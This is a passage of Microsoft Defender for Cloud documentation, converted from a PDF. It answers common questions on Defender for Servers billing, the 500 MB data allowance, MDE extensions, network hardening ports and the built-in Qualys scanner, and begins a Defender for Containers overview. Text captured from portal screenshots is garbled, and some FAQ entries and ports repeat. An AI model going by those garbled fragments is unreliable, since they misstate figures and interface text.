billed, including subscriptions that don't have the Defender for Servers plan 
enabled. 

o For the Azure Monitor agent, billing and feature coverage for Defender for 
Servers depends only on the plan being enabled in the subscription. 


What happens if | enabled the Defender 
for Servers plan at the workspace level 
only (not at subscription)? 


You can enable Microsoft Defender for Servers at the Log Analytics workspace level, but 
only servers reporting to that workspace will be protected and billed, and those servers 
won't receive some benefits, such as Microsoft Defender for Endpoint, vulnerability 


assessment, and just-in-time VM access. 


Is the 500 MB of free data ingestion 
allowance applied per workspace or per 
machine? 


When you have Defender for Servers Plan 2 enabled, you get 500 MB of free data 
ingestion per day. The allowance is specifically for the security data types that are 
directly collected by Defender for Cloud. 


This allowance is a daily rate that's averaged across all nodes. Your total daily free limit is 
equal to [number of machines] x 500 MB. You aren't charged extra if the total doesn't 
exceed your total daily free limit, even if some machines send 100 MB and others send 
800 MB. 


What data types are included in the 
daily allowance? 


Defender for Cloud billing is closely tied to the billing for Log Analytics. Microsoft 
Defender for Servers provides an allocation of 500 MB per node per day for machines 
against the following subset of security data types: 


e SecurityAlert 

e SecurityBaseline 

e SecurityBaselineSummary 

e SecurityDetection 

e SecurityEvent 

e WindowsFirewall 

e SysmonEvent 

e ProtectionStatus 

e Update and UpdateSummary when the Update Management solution isn't running 
in the workspace or solution targeting is enabled. 


If the workspace is in the legacy per-node pricing tier, the Defender for Cloud and Log 
Analytics allocations are combined and applied jointly to all billable ingested data. 


Am | charged for machines that don't 
have Log Analytics installed? 


Yes. You're charged for all machines that are protected by Defender for Servers in Azure 
subscriptions, connected AWS accounts, or connected GCP projects. The term machines 
includes Azure virtual machines, instances of Azure Virtual Machine Scale Sets, and 
Azure Arc-enabled servers. Machines that don't have Log Analytics installed are covered 
by protections that don't depend on the Log Analytics agent. 


If an agent reports to multiple 
workspaces, am I charged twice? 


If a machine reports to multiple workspaces and all of them have Defender for Servers 
enabled, the machines are billed for each attached workspace. 


What's this "MDE.Windows" / 
“MDE.Linux" extension running on my 
machine? 


In the past, Microsoft Defender for Endpoint was provisioned by the Log Analytics 
agent. When we expanded support to include Windows Server 2019 and Linux, we also 
added an extension to perform the automatic onboarding. 


Defender for Cloud automatically deploys the extension to machines running: 


e Windows Server 2019 and Windows Server 2022 

e Windows Server 2012 R2 and 2016 if MDE Unified Solution integration is enabled 

e Windows 10 on Azure Virtual Desktop. 

e Other versions of Windows Server if Defender for Cloud doesn't recognize the OS 
version (for example, when a custom VM image is used). In this case, Microsoft 
Defender for Endpoint is still provisioned by the Log Analytics agent. 


e Linux. 


© Important 


If you delete the MDE.Windows/MDE.Linux extension, it won't remove Microsoft 
Defender for Endpoint. To offboard the machine, see Offboard Windows servers.. 


| enabled the solution but the 
*~MDE.Windows /MDE.Linux extension 
isn't showing on my machine 


If you enabled the integration, but still don't see the extension running on your 
machines: 


1. You need to wait at least 12 hours to be sure there's an issue to investigate. 

2. If after 12 hours you still don't see the extension running on your machines, check 
that you've met Prerequisites for the integration. 

3. Ensure you've enabled the Microsoft Defender for Servers plan for the 
subscriptions related to the machines you're investigating. 


4. If you've moved your Azure subscription between Azure tenants, some manual 
preparatory steps are required before Defender for Cloud deploys Defender for 
Endpoint. For full details, contact Microsoft support Z. 


What are the licensing requirements for 
Microsoft Defender for Endpoint? 


Licenses for Defender for Endpoint for servers are included with Microsoft Defender for 


Servers. 


Do I need to buy a separate anti- 
malware solution to protect my 
machines? 


No. With Defender for Endpoint integration in Defender for Servers, you'll also get 


malware protection on your machines. 


e On Windows Server 2012 R2 with Defender for Endpoint unified solution 
integration enabled, Defender for Servers deploys Microsoft Defender Antivirus in 
active mode. 

e On newer Windows Server operating systems, Microsoft Defender Antivirus is part 
of the operating system and will be enabled in active mode. 

e On Linux, Defender for Servers deploy Defender for Endpoint including the anti- 


malware component, and set the component in passive mode. 


If | already have a license for Microsoft 
Defender for Endpoint, can | get a 
discount for Microsoft Defender for 
Servers? 


If you already have a license for Microsoft Defender for Endpoint for Servers, you won't 
pay for that part of your Microsoft Defender for Servers Plan 2 license. Learn more about 
the Microsoft 365 license. 


To request your discount, contact Defender for Cloud's support team E, You need to 
provide the relevant workspace ID, region, and number of Microsoft Defender for 


Endpoint for servers licenses applied for machines in the given workspace. 


The discount is effective starting from the approval date, and won't take place 
retroactively. 


How do | switch from a third-party EDR 
tool? 


Full instructions for switching from a non-Microsoft endpoint solution are available in 


the Microsoft Defender for Endpoint documentation: Migration overview. 


Which Microsoft Defender for Endpoint 
plan is supported in Defender for 
Servers? 


Defender for Servers Plan 1 and Plan 2 provides the capabilities of Microsoft Defender 
for Endpoint Plan 2. 


Are there any options to enforce the 
application controls? 


No enforcement options are currently available. Adaptive application controls are 
intended to provide security alerts if any application runs other than the ones you've 
defined as safe. They have a range of benefits (What are the benefits of adaptive 
application controls?) and are customizable as shown on this page. 


Why do I see a Qualys app in my 
recommended applications? 


Microsoft Defender for Servers includes vulnerability scanning for your machines. You 
don't need a Qualys license or even a Qualys account - everything's handled seamlessly 
inside Defender for Cloud. For details of this scanner and instructions for how to deploy 
it, see Defender for Cloud's integrated Qualys vulnerability assessment solution. 


To ensure no alerts are generated when Defender for Cloud deploys the scanner, the 
adaptive application controls recommended allowlist includes the scanner for all 


machines. 


Why aren't all of my resources shown, 
such as subscriptions, machines, storage 
accounts in my asset inventory? 


The inventory view lists your Defender for Cloud connected resources from a Cloud 
Security Posture Management (CSPM) perspective. The filters show only the resources 
with active recommendations. 


For example, if you have access to eight subscriptions but only seven currently have 
recommendations, filter by Resource type = Subscriptions shows only the seven 
subscriptions with active recommendations: 


a 


GO Refresh -+ Add non-Azure servers KO Open query 4 Download CSV report [A © Learn more 


| Filter by name Subscriptions == Contoso Dev_EUS, Contoso Infra1, ... Resource Groups == All X C Resource types == subscription (7) > 


Defender for Cloud == All X Monitoring agent == All X Environment == All X Recommendations == All X 


Installed applications == All X< ME Add filter 


Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 
7 a7 % 0 Yo 0 


Resource name Ty Resource type Ty Subscription Ty Monitoring agent Ty Defender for Cloud Ty Recommendations Ty 
? Contoso Hotels Tenant Subscription Contoso Hotels Tenant - P... On E A E 
€ Contoso Hotels Tenant Subscription Contoso Hotels Tenant - Pr.. On B es Er 
? Contoso Infra Subscription Contoso Infra1 On SEU 
Contoso Dev_EUS Subscription Contoso Dev_EUS Partial SEU 
L ? Contoso Dev_India Subscription Contoso Dev_India Partial BK KIE ern 
C] ? Contoso Infra3 Subscription Contoso Infra3 Partial a i 
? Contoso Infra2 Subscription Contoso Infra2 Partial Be çZ w cee 


Why do some of my resources show 
blank values in the Defender for Cloud 
or monitoring agent columns? 


Not all Defender for Cloud monitored resources requires agents. For example, Defender 
for Cloud doesn't require agents to monitor Azure Storage accounts or PaaS resources, 
such as disks, Logic Apps, Data Lake Analysis, and Event Hubs. 


When pricing or agent monitoring isn't relevant for a resource, nothing is shown in 


those columns of inventory. 


» Microsoft Defender for Cloud | Inventory ~ x 
Showing 8 subscriptions 
GO Refresh -+ Add non-Azure servers E Open query 4 Download CSV report (A © Learn more A Guides & Feedback 
Filter by name Subscriptions == All X Resource Groups == All X Resource types == All X Installed applications == All X 


Defender for Cloud == All X Monitoring agent == All X Environment == All X Recommendations == All X ko Add filter 


Resource name Ty Resource type Ty Subscription Ty Monitoring agent Ty Defender for Cloud Ty Recommendations Ty 
E chi-devm01-dev Virtual machines Contoso Hotels Tenant - .... D installed On ES 
E chi-devmo0-dev Virtual machines Contoso Hotels Tenant - ... D installed m 


On eos 
® chi-contosowebappsve-sjddnzu4rk-pri... App Services Contoso Hotels Tenant - ... On B E rro 
= ontosoetailndiadiag Storage accounts Contoso Dev_India On BO E rro 
E, kenieva-test Event Hubs Namespaces Contoso Infra i. | es es rr 
® ch1-migrationfunctions App Services Contoso Hotels Tenant - ... [ss n ses 


Oi 

KA am-temp6f15ccd7 Virtual machines Contoso Hotels Tenant - .. D Not installed On B II 
GO 
O 


@ ch1-migrationfunctions-dev App Services Contoso Hotels Tenant - e n 
= shicksstorageaccttest Storage accounts Contoso Infra1 n 


@ testest_osdisk_1_a15b32136f384349b1... Disks Contoso Infra1 Lo o E] B A pr 


Which ports are supported by adaptive 
network hardening? 


Adaptive network hardening recommendations are only supported on the following 
specific ports (for both UDP and TCP): 


13, 17, 19, 22, 23, 53, 69, 81, 111, 119, 123, 135, 137, 138, 139, 161, 162, 389, 445, 512, 
514, 593, 636, 873, 1433, 1434, 1900, 2049, 2301, 2323, 2381, 3268, 3306, 3389, 4333, 
5353, 5432, 5555, 5800, 5900, 5900, 5985, 5986, 6379, 6379, 7000, 7001, 7199, 8081, 
8089, 8545, 9042, 9160, 9300, 11211, 16379, 26379, 27017, 37215 


Are there any prerequisites or VM 
extensions required for adaptive 
network hardening? 


Adaptive network hardening is an agentless feature of Microsoft Defender for Cloud - 
nothing needs to be installed on your machines to benefit from this network hardening 
tool. 


When should I use a "Deny all traffic" 
rule? 


A Deny all traffic rule is recommended when, as a result of running the algorithm, 
Defender for Cloud doesn't identify traffic that should be allowed, based on the existing 
NSG configuration. Therefore, the recommended rule is to deny all traffic to the 
specified port. The name of this type of rule is displayed as "System Generated". After 
enforcing this rule, its actual name in the NSG will be a string comprised of the protocol, 
traffic direction, "DENY", and a random number. 


How do | deploy the prerequisites for 
the security configuration 
recommendations? 


To deploy the Guest Configuration extension with its prerequisites: 


e For selected machines, follow the security recommendation Guest Configuration 
extension should be installed on your machines from the Implement security 
best practices security control. 


e At scale, assign the policy initiative Deploy prerequisites to enable Guest 
Configuration policies on virtual machines. 


Why is a machine shown as not 
applicable? 


The list of resources in the Not applicable tab includes a Reason column. Some of the 
common reasons include: 


Reason Details 
No scan data available There aren't any compliance results for this machine in Azure 
on the machine Resource Graph. All compliance results are written to Azure 


Resource Graph by the Guest Configuration extension. You can 
check the data in Azure Resource Graph using the sample 
queries in Azure Policy Guest Configuration - sample ARG 


queries. 
Guest Configuration The machine is missing the Guest Configuration extension, 
extension isn't installed which is a prerequisite for assessing the compliance with the 


on the machine Azure security baseline. 


Reason Details 


System managed A system-assigned, managed identity must be deployed on 
identity isn't configured the machine. 
on the machine 


The recommendation is The policy definition that assesses the OS baseline is disabled 
disabled in policy on the scope that includes the relevant machine. 


If | enable Defender for Clouds Servers 
plan on the subscription level, do | need 
to enable it on the workspace level? 


When you enable the Servers plan on the subscription level, Defender for Cloud enables 
the Servers plan on your default workspaces automatically. Connect to the default 
workspace by selecting Connect Azure VMs to the default workspace(s) created by 
Defender for Cloud option and selecting Apply. 


Microsoft Azure (Preview) Æ Search resources, services, and docs (G+/) YF A & O Si 


Home > Microsoft Defender for Cloud > Settings Extension deployment configuration x 


hine: 


Security agent for virtual mac 


x Settings | Auto provisioning 
@ if a VM already has either SCOM or OMS agent installed locally, the Log Analytics agent 
extension will still be installed and connected to the configured workspace. 
A Search (Ctrl+/) 


Settings 
ended ' Zo @ Any other solutions enabled on the selected workspace will be applied to Azure VMs that 
atender plans Extension Status Resources missing € are connected to it. For paid solutions, this could result in additional charges. 
For data privacy considerations, please make sure your selected workspace is in your 


s Auto provisioning desired region. 


Log Analytics agent for Azure VMs On E 4 of 10 virtual 
@ Email notifications machine 

Show in i i i 

@ Integrations ow in inver’ Workspace configuration 
Data collected by Defender for Cloud is stored in Log Analytics workspace(s). You can select 
to have data collected from Azure VMs stored in workspace(s) created by Defender for 


ZA Workflow automation 
Log Analytics agent for Azure Arc Off B oof 0 Azure A Cloud or in an existing workspace you created. Learn more > 


E Continuous export Machines (preview) berd 
Set (@) Connect Azure VMs to the default workspace(s) created by Defender for Cloud 
© Connect Azure VMs to a different workspace 
$: Security policy Vulnerability assessment for machines of E to of 10 virtua 
machines 


Show in inven’ Store additional raw data - Windows security events 


To help audit, investigate, and analyze threats, you can collect raw events, logs, and 
additional security data and save it to your Log Analytics workspace 


E sof tovirtual Select the level of data to store for this workspace. Charges will apply for all settings other 


Guest Configuration agent (preview) Off © 
than "None". 


machines 
Show in invent 


Apply Cancel 


However, if you're using a custom workspace in place of the default workspace, you 
need to enable the Servers plan on all of your custom workspaces that don't have it 


enabled. 


If you're using a custom workspace and enable the plan on the subscription level only, 
the Microsoft Defender for servers should be enabled on workspaces recommendation 
appears on the Recommendations page. This recommendation gives you the option to 
enable the servers plan on the workspace level with the Fix button. You're charged for all 


VMs in the subscription even if the Servers plan isn't enabled for the workspace. The 
VMs won't benefit from features that depend on the Log Analytics workspace, such as 
Microsoft Defender for Endpoint, VA solution (MDVM/Qualys), and Just-in-Time VM 


access. 


Enabling the Servers plan on both the subscription and its connected workspaces, won't 
incur a double charge. The system will identify each unique VM. 


If you enable the Servers plan on cross-subscription workspaces, connected VMs from 
all subscriptions will be billed, including subscriptions that don't have the Servers plan 
enabled. 


Will | be charged for machines without 
the Log Analytics agent installed? 


Yes. When you enable Microsoft Defender for Servers on an Azure subscription or a 
connected AWS account, you'll be charged for all machines that are connected to your 
Azure subscription or AWS account. The term machines include Azure virtual machines, 
Azure Virtual Machine Scale Sets instances, and Azure Arc-enabled servers. Machines 
that don't have Log Analytics installed are covered by protections that don't depend on 
the Log Analytics agent. 


If a Log Analytics agent reports to 
multiple workspaces, will | be charged 
twice? 


If a machine, reports to multiple workspaces, and all of them have Defender for Servers 
enabled, the machines will be billed for each attached workspace. 


If a Log Analytics agent reports to 
multiple workspaces, is the 500-MB free 
data ingestion available on all of them? 


Yes. If you configure your Log Analytics agent to send data to two or more different Log 
Analytics workspaces (multi-homing), you'll get 500-MB free data ingestion for each 
workspace. It's calculated per node, per reported workspace, per day, and available for 


every workspace that has a ‘Security’ or ‘AntiMalware’ solution installed. You'll be 
charged for any data ingested over the 500-MB limit. 


Is the 500-MB free data ingestion 
calculated for an entire workspace or 
strictly per machine? 


You receive a daily allowance of 500 MB of free data ingestion for each virtual machine 
(VM) connected to the workspace. This allocation specifically applies to the security data 
types collected directly by Defender for Cloud. 


The data allowance is a daily rate calculated across all connected machines. Your total 
daily free limit is equal to the [number of machines] x 500 MB. So even if on a given 
day some machines send 100 MB and others send 800 MB, if the total data from all 
machines doesn't exceed your daily free limit, you won't be charged extra. 


What data types are included in the 
500-MB data daily allowance? 


Defender for Cloud's billing is closely tied to the billing for Log Analytics. Microsoft 
Defender for Servers provides a 500 MB/node/day allocation for machines against the 
following subset of security data types: 


e SecurityAlert 

e SecurityBaseline 

e SecurityBaselineSummary 

e SecurityDetection 

e SecurityEvent 

e WindowsFirewall 

e SysmonEvent 

e ProtectionStatus 

e Update and UpdateSummary when the Update Management solution isn't running 
in the workspace or solution targeting is enabled. 


If the workspace is in the legacy Per Node pricing tier, the Defender for Cloud and Log 
Analytics allocations are combined and applied jointly to all billable ingested data. To 
learn more on how Microsoft Sentinel customers can benefit, please see the Microsoft 
Sentinel Pricing page”. 


How can I monitor my daily usage? 


You can view your data usage in two different ways, the Azure portal, or by running a 


script. 


To view your usage in the Azure portal: 


1. Sign in to the 


Azure portal £. 


2. Navigate to Log Analytics workspaces. 


3. Select your workspace. 


4. Select Usage and estimated costs. 


© test1 | Usage and estimated costs * 


sworkspace | @ Directory 


b Access control (IAM) 

@ Tags 

@ Diagnose and solve problems 
Settings 

A Locks 


@ Agents managem: 


Agents con 


GO 


Computer Groups 
D Data Export 

= Linked storage accounts 
4) Network Isolation 


{E Tables ( 


General 

== Workspace summary 

Si Workbooks 

d Logs 

Solutions 

© Usage and estimated costs 


I Properties 


Microsoft 
ZI Usage details @ Dailycap d DataRetention C? Help 


Your Log Analytics cost depends on your choice of pricing tier. data retention and which solutions are used. Here you 
can see the e: d monthly cost for each of the available pricing tiers, based on your last 31-days of Log Analytics 
data ingested. ist estimates can be used to help you select the best pricing tier b ta ingestion 
patterns. The w der. This page 
does not ref have questions 
about using this 


actual billed usage. To v 
page, contact us. Learn more about 


Management (learn more) 
pricing 


Pricing Tiers 


~ Pay-as-you-go x] 
Per GB 


The Pay-as-you-go pricing tier offers flexible co 
ingested. There are additional charges if you incre; 
(or 90 day included retention if using Sentinel on this 


n pricing in which you are charged per GB of data 
data retention above the 31 day included retention 
rkspace). Learn more about Log Analytics pricing. 


Estimated costs 


Monthly usage (last 31 


Item type Price days) Estimated monthly cost 
Log data ingestion, 2.76 0.00 GB 0.00 
Defender allowance $0.00___0.00 GB $0.00 
ta retention (beyond 31 days) $0.12 0.00 GB $0.00 
$0.00 


(These estimated costs do not include Microsoft Defender costs. The Microsoft Defender 500 MB/node/day 
data allowance is factored into the estimate of Log Analytics billing. Learn more.) 


@ This is the current pricing tier. 


v 100 GB/day Commitment Tier 
15% discount over Pay-as-you-go 


V 200 GB/day Commitment Tier 
20% discount over Pay-as-you-go 


Usage Charts 


Billable data ingestion per solution (last 31 days) 


Apr 24 


Data ingested per solution (last 90 days) 
Category 


No data 


Usage 


Mays 


2 
H Loomanace. 


You can also view estimated costs under different pricing tiers by selecting “ for each 


pricing tier. 


(0) SecureScore| Usage and estimated costs * 
Lo space |0 


Directory: Microsoft 


sage details @ Paben Ẹ Deta Retention C] Help 
Usage Charts 


Billable data ingestion per solution (last 31 days) 


^ Pay-as-you-go 
Per GE 

exible consumption pricing in which you are charged per GB of data ingested, There are additional 

bove the 31 day included retention (or 30 day included retention if using Sentinel on this 


een ZO e Mays eru 


Price Monthly usage (last 31 days) _ Estimated monthly cost 


Item type 
0.93. GB S244 


750 GB 


50.10 EEE 
2a Data ingested per solution (ast 90 days) 
fender costs, The Microsoft Defender 500 ME/node/day data allowance is factored into Category bg 
LogManagement 1.85 68 
10m8 


Update/Security 


A 100 GB/day Commitment Tier 
15% discount over Pay-as-you-go 


© Usage and estimated costs 


I Properties 


Monthly usage (last 31 days) Estimated monthly cost 
31 days 36,076.00 


0.00 GB $0.00 
0.00 GB $0.00 
‘$6,076.00 


en Defender costs. The Microsoft Defender 500 ME/node/day data allowance is factored into 
more) Q 


V 200 GB/day Commitment Tier 
20% discount over Pay-as-you-go 


To view your usage by using a script: 
1. Sign in to the Azure portal Z. 
2. Navigate to Log Analytics workspaces > Logs. 
3. Select your time range. Learn about time ranges. 


4. Copy and past the following query into the Type your query here section. 


Azure CLI 


lene Jite SGS 

Usage 

| where IsBillable == 'TRUE' 

| where DataType in ('SecurityAlert', 'SecurityBaseline', 
"SecurityBaselineSummary', ‘SecurityDetection', ‘SecurityEvent', 
"WindowsFirewall', ‘MaliciousIPCommunication', ‘SysmonEvent', 
"ProtectionStatus', ‘Update’, ‘UpdateSummary' ) 

| project TimeGenerated, DataType, Solution, Quantity, QuantityUnit 
| summarize DataConsumedPerDataType = sum(Quantity)/1024 by DataType, 
DataUnit = Unit 

| sort by DataConsumedPerDataType desc 


5. Select Run. 


„® SecureScore|Logs d 
SE Log analytics workspace | @ Directory: Microsoft 


E 


You can learn how to Analyze usage in Log Analytics workspace. 


Based on your usage, you won't be billed until you've used your daily allowance. If 
you're receiving a bill, it's only for the data used after the 500-MB limit is reached, or for 
other service that doesn't fall under the coverage of Defender for Cloud. 


How can | manage my costs? 


You may want to manage your costs and limit the amount of data collected for a 
solution by limiting it to a particular set of agents. Use solution targeting to apply a 
scope to the solution and target a subset of computers in the workspace. If you're using 
solution targeting, Defender for Cloud lists the workspace as not having a solution. 


@ Important 


Solution targeting has been deprecated because the Log Analytics agent is being 
replaced with the Azure Monitor agent and solutions in Azure Monitor are being 
replaced with insights. You can continue to use solution targeting if you already 
have it configured, but it isn't available in new regions. The feature won't be 
supported after August 31, 2024. Regions that support solution targeting until the 
deprecation date are: 


Region code Region name 
CCAN canadacentral 
CHN switzerlandnorth 


CID centralindia 


Region code 


CQ 


CUS 


DEWC 


DXB 


EA 


EAU 


EJP 


EUS 


EUS2 


NCUS 


NEU 


NOE 


PAR 


SCUS 


SE 


SEA 


SEAU 


SUK 


Region name 


brazilsouth 


centralus 


germanywestcentral 


UAENorth 


eastasia 


australiaeast 


japaneast 


eastus 


eastus2 


northcentralus 


NorthEurope 


norwayeast 


FranceCentral 


southcentralus 


KoreaCentral 


southeastasia 


australiasoutheast 


uksouth 


Region code Region name 


WCUS westcentralus 
WEU westeurope 
WUS westus 

WUS2 westus2 


Air-gapped clouds 


UsNat 


UsNat 


UsGov 


China 


UsGov 


UsSec 


UsSec 


Next steps 


Region code 


EXE 


EXW 


FF 


MC 


PHX 


RXE 


RXW 


Plan your Defender for Servers deployment 


Region name 


usnateast 


usnatwest 


usgowvirginia 


ChinaEast2 


usgovarizona 


usseceast 


ussecwest 


Common questions about virtual 
machines 


FAQ 


What types of virtual machines are 
supported? 


Monitoring and recommendations are available for virtual machines (VMs) created using 
both the classic and Resource Manager deployment models. 


See Supported platforms in Microsoft Defender for Cloud for a list of supported 
platforms. 


Why doesn't Microsoft Defender for 
Cloud recognize the antimalware 
solution running on my Azure VM? 


Microsoft Defender for Cloud has visibility into antimalware installed through Azure 
extensions. For example, Defender for Cloud is not able to detect antimalware that was 
pre-installed on an image you provided or if you installed antimalware on your virtual 


machines using your own processes (such as configuration management systems). 


Why do I get the message "Missing 
Scan Data" for my VM? 


This message appears when there is no scan data for a VM. It can take some time (less 
than an hour) for scan data to populate after Data Collection is enabled in Microsoft 
Defender for Cloud. After the initial population of scan data, you may receive this 
message because there is no scan data at all or there is no recent scan data. Scans do 
not populate for a VM in a stopped state. This message could also appear if scan data 
has not populated recently (in accordance with the retention policy for the Windows 
agent, which has a default value of 30 days). 


How often does Defender for Cloud 
scan for operating system 
vulnerabilities, system updates, and 
endpoint protection issues? 


Below are the latency times for Defender for Cloud scans of vulnerabilities, updates, and 
issues: 


e Operating system security configurations — data is updated within 48 hours 
e System updates — data is updated within 24 hours 
e Endpoint Protection issues — data is updated within 8 hours 


Defender for Cloud typically scans for new data every hour, and refreshes the 
recommendations accordingly. 


Defender for Cloud uses monitoring components to collect and store data. To learn 


more about monitoring components. 


Why do I get the message "VM Agent is 
Missing?" 


The VM Agent must be installed on VMs to enable Data Collection. The VM Agent is 
installed by default for VMs that are deployed from the Azure Marketplace. For 
information on how to install the VM Agent on other VMs, see the blog post VM Agent 
and Extensions”. 


How are VM snapshots secured? 


Agentless scanning protects disk snapshots according to Microsoft's highest security 
standards. To ensure VM snapshots are private and secure during the analysis process, 
some of the measures taken are: 


e Data is encrypted at rest and in-transit. 

e Snapshots are immediately deleted when the analysis process is complete. 

e Snapshots remain within their original AWS or Azure region. EC2 snapshots aren't 
copied to Azure. 

e Isolation of environments per customer account/subscription. 


e Only metadata containing scan results is sent outside the isolated scanning 
environment. 
e All operations are audited. 


Common questions about 
vulnerability assessment 


FAQ 


Are there any additional charges for the 
Qualys license? 


No. The built-in scanner is free to all Microsoft Defender for Servers users. The 
recommendation deploys the scanner with its licensing and configuration information. 
No additional licenses are required. 


What prerequisites and permissions are 
required to install the Qualys extension? 


You'll need write permissions for any machine on which you want to deploy the 


extension. 


The Microsoft Defender for Cloud vulnerability assessment extension (powered by 
Qualys), like other extensions, runs on top of the Azure Virtual Machine agent. So it runs 
as Local Host on Windows, and Root on Linux. 


During setup, Defender for Cloud checks to ensure that the machine can communicate 
over HTTPS (default port 443) with the following two Qualys data centers: 


e https://qagpublic.qg3.apps.qualys.com - Qualys' US data center 


e https://qagpublic.qg2.apps.qualys.eu - Qualys' European data center 


The extension doesn't currently accept any proxy configuration details. However, you 
can configure the Qualys agent's proxy settings locally in the Virtual Machine. Please 
follow the guidance in the Qualys documentation: 


e Windows proxy configuration E 


e Linux proxy configuration E 


Can | remove the Defender for Cloud 
Qualys extension? 


If you want to remove the extension from a machine, you can do it manually or with any 


of your programmatic tools. 
You'll need the following details: 


e On Linux, the extension is called LinuxAgent.AzureSecurityCenter and the 
publisher name is Qualys. 
e On Windows, the extension is called WindowsAgent.AzureSecurityCenter and the 


provider name is Qualys. 


How can | check that the Qualys 
extension is properly installed? 


You can use the curl command to check the connectivity to the relevant Qualys URL. A 


valid response would be: {"code":404,"message":"HTTP 404 Not Found"} 


In addition, make sure that the DNS resolution for these URLs is successful and that 
everything is valid with the certificate authority “ that is used. 


How does the extension get updated? 


Like the Microsoft Defender for Cloud agent itself and all other Azure extensions, minor 
updates of the Qualys scanner might automatically happen in the background. All 
agents and extensions are tested extensively before being automatically deployed. 


Why does my machine show as "not 
applicable" in the recommendation? 


If you have machines in the not applicable resources group, Defender for Cloud can't 
deploy the vulnerability scanner extension on those machines because: 


e The vulnerability scanner included with Microsoft Defender for Cloud is only 
available for machines protected by Microsoft Defender for Servers. 


e It's a PaaS resource, such as an image in an AKS cluster or part of a virtual machine 
scale set. 


e It's not running one of the supported operating systems”. 


Can the built-in vulnerability scanner 
find vulnerabilities on the VMs network? 


No. The scanner runs on your machine to look for vulnerabilities of the machine itself, 


not for your network. 


Does the scanner integrate with my 
existing Qualys console? 


The Defender for Cloud extension is a separate tool from your existing Qualys scanner. 
Licensing restrictions mean that it can only be used within Microsoft Defender for Cloud. 


How quickly will the scanner identify 
newly disclosed critical vulnerabilities? 


Within 48 hours of the disclosure of a critical vulnerability, Qualys incorporates the 
information into their processing and can identify affected machines. 


If | deploy a Qualys agent, what 
communications settings are required? 


The Qualys Cloud Agent is designed to communicate with Qualys's SOC at regular 
intervals for updates, and to perform the various operations required for product 
functionality. To allow the agent to communicate seamlessly with the SOC, configure 
your network security to allow inbound and outbound traffic to the Qualys SOC CIDR 
and URLs. 


There are multiple Qualys platforms across various geographic locations. The SOC CIDR 
and URLs differ depending on the host platform of your Qualys subscription. Identify 
your Qualys host platform Z. 


Why do | have to specify a resource 
group when configuring a Bring Your 
Own License (BYOL) solution? 


When you set up your solution, you must choose a resource group to attach it to. The 
solution isn't an Azure resource, so it won't be included in the list of the resource 
group’s resources. Nevertheless, it's attached to that resource group. If you later delete 
the resource group, the BYOL solution is unavailable. 


Overview of Microsoft Defender for 
Containers 
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Microsoft Defender for Containers is the cloud-native solution to improve, monitor, and 
maintain the security of your clusters, containers, and their applications. 


Defender for Containers assists you with four core aspects of container security: 


e Environment hardening - Defender for Containers protects your Kubernetes 
clusters whether they're running on Azure Kubernetes Service, Kubernetes on- 
premises/laaS, or Amazon EKS. Defender for Containers continuously assesses 
clusters to provide visibility into misconfigurations and guidelines to help mitigate 
identified threats. 


e Vulnerability assessment - Vulnerability assessment and management tools for 
images stored in Azure Container Registry and Elastic Container Registry 


e Run-time threat protection for nodes and clusters - Threat protection for clusters 
and nodes generates security alerts for suspicious activities. 


e Agentless discovery for Kubernetes - Provides tools that give you visibility into 
your data plane components, generating security insights based on your 
Kubernetes and environment configuration and lets you hunt for risks. 


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: Microsoft Defender for Containers. 


Microsoft Defender for Containers plan 
availability 


Aspect Details 


Release state: General availability (GA) 
Certain features are in preview, for a full list see the availability section. 


Feature availability Refer to the availability section for additional information on feature 
release state and availability. 


Pricing: Microsoft Defender for Containers is billed as shown on the pricing 
page? 


Aspect 


Required roles and 
permissions: 


Clouds: 


Hardening 


Details 


e To deploy the required components, see the permissions for each of 
the components 

e Security admin can dismiss alerts 

e Security reader can view vulnerability assessment findings 

See also Roles for remediation and Azure Container Registry roles and 
permissions 


Azure: 

OO Commercial clouds 

Lv] National clouds (Azure Government, Microsoft Azure operated by 
21Vianet) (Except for preview features)) 


Non-Azure: 

© Connected AWS accounts (Preview) 

OO Connected GCP projects (Preview) 

Lv] On-prem/laaS supported via Arc enabled Kubernetes (Preview). 


For more information about, see the availability section. 


Continuous monitoring of your Kubernetes clusters - 
wherever they're hosted 


Defender for Cloud continuously assesses the configurations of your clusters and 


compares them with the initiatives applied to your subscriptions. When it finds 
misconfigurations, Defender for Cloud generates security recommendations that are 


available on Defender for Cloud's Recommendations page. The recommendations let 


you investigate and remediate issues. 


You can use the resource filter to review the outstanding recommendations for your 


container-related resources, whether in asset inventory or the recommendations page: 


y= Microsoft Defender for Cloud | Recommendations 


Showing 91 subscriptions 
P Search (Ctrl+/) © Refresh dk Download CSV report SZ Open query [J Governance report (preview) Guides & Feedback 


General @ one subscription doesn’t have the default policy assigned. To review the list of subscriptions, open the Security Policy page. 


© Overview 
@ Getting started Secure score recommendations AI recommendations 
ZZ Recommendations 
@ Security alerts Secure score © Active items Resource health 
© Inventory DO 44% Controls Recommendations pe 
° 15/5 216/287 I Unhealtt I Healt licabl 

@ Workbooks Unhealthy (2282) Healthy (1018) Not applicable (532) 
23 Community 
@ Diagnose and solve problems 

O Search recommendations Recommendation status == None X Severity == None X Resource type == None X mmendat 
Cloud Security 
Ọ Security posture 

© Name ty Max score “J Current score Ty Potential score in 
Ọ Regulatory compliance 

> Enable MFA 10 ZELULA +7% 


For details on the recommendations that might appear for this feature, check out the 
compute section of the recommendations reference table. 


Kubernetes data plane hardening 


To protect the workloads of your Kubernetes containers with tailored recommendations, 
you can install the Azure Policy for Kubernetes. Learn more about monitoring 
components for Defender for Cloud. 


With the add-on on your AKS cluster, every request to the Kubernetes API server will be 
monitored against the predefined set of best practices before being persisted to the 
cluster. You can then configure it to enforce the best practices and mandate them for 
future workloads. 


For example, you can mandate that privileged containers shouldn't be created, and any 
future requests to do so will be blocked. 


You can learn more about Kubernetes data plane hardening. 


Vulnerability assessment 


Defender for Containers scans the container images in Azure Container Registry (ACR) 
and Amazon AWS Elastic Container Registry (ECR) to provide vulnerability reports for 
your container images, providing details for each vulnerability detected, remediation 
guidance, real-world exploit insights, and more. 


There are two solutions for vulnerability assessment in Azure, one powered by Microsoft 
Defender Vulnerability Management and one powered by Qualys. 


Learn more about: 


e Vulnerability assessments for Azure with Microsoft Defender Vulnerability 
Management 


e Vulnerability assessment for Azure powered by Qualys 
e Vulnerability assessment for Amazon AWS Elastic Container Registry (ECR) 


Run-time protection for Kubernetes nodes and 
clusters 


Defender for Containers provides real-time threat protection for supported 
containerized environments and generates alerts for suspicious activities. You can use 
